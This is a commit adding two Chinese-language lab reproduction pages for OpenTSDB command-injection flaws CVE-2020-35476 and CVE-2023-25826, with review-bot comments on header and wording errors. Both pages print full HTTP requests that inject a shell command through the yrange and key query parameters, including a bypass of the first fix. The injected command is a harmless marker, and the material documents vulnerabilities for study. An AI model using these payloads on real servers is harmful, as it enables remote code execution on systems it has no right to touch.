Commit
update opentsdb cve-2020-35476 & cve-2023-25826
Showing 19 changed files with 196 additions and 3 deletions.
@@ -0,0 +1,77 @@ | ||
# OpenTSDB 命令注入漏洞 CVE-2020-35476 | ||
|
||
## 漏洞描述 | ||
|
||
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。在其 2.4.0 版本及之前,存在一处命令注入漏洞。 | ||
|
||
参考链接: | ||
|
||
- [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051) | ||
- [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html) | ||
|
||
## 环境搭建 | ||
|
||
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.0: | ||
|
||
``` | ||
docker compose up -d | ||
``` | ||
|
||
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。 | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165806970.png) | ||
|
||
## 漏洞复现 | ||
|
||
利用这个漏洞需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165830409.png) | ||
|
||
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以我们可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录: | ||
|
||
``` | ||
POST /api/put/ HTTP/1.1 | ||
Host: your-ip:4242 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
Content-Type: application/x-www-form-urlencoded | ||
Connection: close | ||
Content-Length: 150 | ||
{ | ||
"metric": "sys.cpu.nice", | ||
"timestamp": 1346846400, | ||
"value": 20, | ||
"tags": { | ||
"host": "web01", | ||
"dc": "lga" | ||
} | ||
} | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165935912.png) | ||
|
||
如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。再次查看 metric 列表,metric 已经创建完成: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170059167.png) | ||
|
||
发送如下数据包,其中参数`m`的值必须包含一个有数据的 metric: | ||
|
||
``` | ||
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 | ||
Host: your-ip:4242 | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
Connection: close | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170532492.png) | ||
|
||
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170625205.png) |
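Review bot: the `POST /api/put/` request in this hunk sends a JSON body under `Content-Type: application/x-www-form-urlencoded` with a hard-coded `Content-Length: 150`; `/api/put` takes JSON, so the header should read `Content-Type: application/json`, and the fixed length only holds if the body is pasted byte-for-byte as shown, so either drop it or note that it must match the body. Two smaller points: "Hbase" in the description should be spelled "HBase", and the startup command here is `docker compose up -d` while the sibling CVE-2023-25826 page in this same commit uses `docker-compose up -d`; use one form on both pages. The description also gives only the affected range (2.4.0 and earlier); since the sibling page treats 2.4.1 as the release carrying the (incomplete) fix, naming that release here would tell readers what to upgrade past.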
docs-base/docs/vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md (104 additions, 0 deletions)
@@ -0,0 +1,104 @@ | ||
# OpenTSDB 命令注入漏洞 CVE-2023-25826 | ||
|
||
## 漏洞描述 | ||
|
||
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。 | ||
|
||
参考链接: | ||
|
||
- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/) | ||
- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275) | ||
|
||
## 环境搭建 | ||
|
||
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.1: | ||
|
||
``` | ||
docker-compose up -d | ||
``` | ||
|
||
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。 | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171841166.png) | ||
|
||
## 漏洞复现 | ||
|
||
这之前的都和 CVE-2020-35476 一致,也是需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表。 | ||
|
||
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以也可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录: | ||
|
||
``` | ||
POST /api/put/ HTTP/1.1 | ||
Host: your-ip:4242 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
Content-Type: application/x-www-form-urlencoded | ||
Connection: close | ||
Content-Length: 150 | ||
{ | ||
"metric": "sys.cpu.nice", | ||
"timestamp": 972388800, | ||
"value": 20, | ||
"tags": { | ||
"host": "web01", | ||
"dc": "lga" | ||
} | ||
} | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171931111.png) | ||
|
||
如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。 | ||
|
||
发送 CVE-2020-35476 payload : | ||
|
||
``` | ||
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 | ||
Host: your-ip:4242 | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
Connection: close | ||
``` | ||
|
||
将返回错误: | ||
|
||
``` | ||
{"err":"'yrange' was invalid. Must be in the format [min:max]."} | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172116456.png) | ||
|
||
CVE-2023-25826 绕过修复的一个点,在参数 key 这里: | ||
|
||
```shell | ||
# CVE-2020-35476 | ||
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json | ||
|
||
# CVE-2023-25826 | ||
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json | ||
``` | ||
|
||
发送数据包: | ||
|
||
``` | ||
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1 | ||
Host: your-ip:4242 | ||
Upgrade-Insecure-Requests: 1 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 | ||
Accept-Encoding: gzip, deflate | ||
Accept: */* | ||
Accept-Language: en | ||
Connection: close | ||
``` | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172238155.png) | ||
|
||
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行: | ||
|
||
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172321376.png) |
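Review bot: `image-20240307172057803.png` is added under `images/OpenTSDB 命令注入漏洞 CVE-2023-25826/` in this commit but no line of this page references it; either add the missing `![](...)` line (most likely next to the failed CVE-2020-35476 payload and its error screenshot) or drop the unused binary. On the content: the page shows the payload moving from `yrange` to `key` but never says why the 2.4.1 check is bypassed; a sentence pointing out that the error `'yrange' was invalid. Must be in the format [min:max].` shows the fix validates the format of `yrange` only, while `key` is still passed through unvalidated, would make the root cause clear to readers. As on the sibling page, the JSON `/api/put/` body is sent with `Content-Type: application/x-www-form-urlencoded` and should use `application/json`, and `docker-compose up -d` here versus `docker compose up -d` there should be unified. Finally, the description says 2.4.1 and earlier are affected and links PR #2275 as a reference; stating which release includes that fix would tell readers what to upgrade to.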
Binary files added:

- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165806970.png (+165 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165830409.png (+45.5 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307165935912.png (+121 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170059167.png (+48.2 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170532492.png (+130 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2020-35476/image-20240307170625205.png (+48.8 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307171841166.png (+167 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307171931111.png (+47.2 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172057803.png (+118 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172116456.png (+118 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172238155.png (+131 KB)
- ...e/docs/vulhub/images/OpenTSDB 命令注入漏洞 CVE-2023-25826/image-20240307172321376.png (+47.9 KB)